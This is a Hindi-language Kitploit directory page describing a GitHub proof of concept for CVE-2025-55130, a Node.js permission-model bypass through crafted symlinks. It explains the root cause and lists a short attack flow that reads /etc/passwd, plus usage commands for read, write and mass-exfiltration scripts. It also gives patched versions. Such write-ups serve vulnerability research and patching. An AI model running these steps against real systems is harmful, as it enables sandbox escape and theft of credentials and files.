Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55130 — CVE-2025-55130 के लिए POC | Kitploit
उपकरण/GitHubGitHub/scumfrog/cve-2025-55130
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणडेटा निष्कासनवेब सुरक्षाकंटेनर एस्केप
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

CVE-2025-55130 के लिए POC

रिपॉजिटरी देखें
147 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55130 - Node.js अनुमति मॉडल सिमलिंक एस्केप

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js अनुमति मॉडल बायपास क्राफ्टेड सिमलिंक के माध्यम से
                   [ खोजकर्ता: natann @ JFrog ]

अवलोकन

Node.js में एक पथ ट्रैवर्सल दोष है जो --allow-fs-read और --allow-fs-write अनुमति प्रतिबंधों से बाहर निकलने की अनुमति देता है, जिसमें सिमलिंक का उपयोग निरपेक्ष पथों की ओर इंगित करने और सापेक्ष ट्रैवर्सल के साथ संयोजन करने से होता है।

अनुमति जांच और पथ समाधान अलग-अलग होते हैं। एक बार प्रारंभिक पथ अनुमति जांच पास कर लेता है, तो सिमलिंक का अनुसरण किया जाता है और ट्रैवर्सल अनुक्रम सैंडबॉक्स से बाहर निकल जाते हैं।

प्रभावित संस्करण

शाखाकमजोर

तकनीकी विश्लेषण

मूल कारण

root@kitploit:~
अनुमति जांच:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ अनुमति (./ से शुरू होता है)
                   
पथ समाधान:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   हल होकर /etc/passwd पर जाता है - सैंडबॉक्स के बाहर

अनुमति मॉडल सिमलिंक समाधान से पहले पथ स्ट्रिंग को मान्य करता है। सिमलिंक को निरपेक्ष पथ पर बनाकर और सिमलिंक के बाद ../ ट्रैवर्सल का उपयोग करके, हम अनुमत निर्देशिका से बाहर निकल जाते हैं।

हमला प्रवाह

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # अनुमत पथ में नेस्टेड निर्देशिकाएँ बनाएँ
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # सिमलिंक निरपेक्ष पथ पर
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         अनुमति जांच पास (अंदर ./)
   
   सिमलिंक समाधान के बाद:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   ट्रैवर्सल रूट से बाहर निकलता है

फ़ाइलें

फ़ाइलउद्देश्य
exploit.jsमुख्य एक्सप्लॉइट - मनमानी फ़ाइलें पढ़ें
exploit_write.jsमनमानी फ़ाइलें लिखें

उपयोग

root@kitploit:~
# बुनियादी शोषण
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# जाँचें कि कमजोर है या नहीं
node check.js

# बड़े पैमाने पर एक्सफ़िल
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

प्रभाव

  • संवेदनशील फ़ाइलें पढ़ें: /etc/passwd, /etc/shadow, SSH कुंजियाँ, कॉन्फ़िग
  • मनमानी फ़ाइलें लिखें: क्रॉन जॉब, authorized_keys, कॉन्फ़िग
  • मल्टी-टेनेंट वातावरण में कंटेनर एस्केप
  • अविश्वसनीय कोड निष्पादन के लिए सैंडबॉक्स बायपास

संदर्भ

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

श्रेय

  • भेद्यता: नतान नेहोराई (natann) @ JFrog सुरक्षा अनुसंधान
  • सुधार: RafaelGSS @ Node.js

केवल अनुसंधान और अधिकृत परीक्षण के लिए।

टूल डाउनलोड करें
पैच किया गया
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.js
बड़े पैमाने पर फ़ाइल एक्सफ़िल्ट्रेशन
check.jsसंस्करण भेद्यता जाँच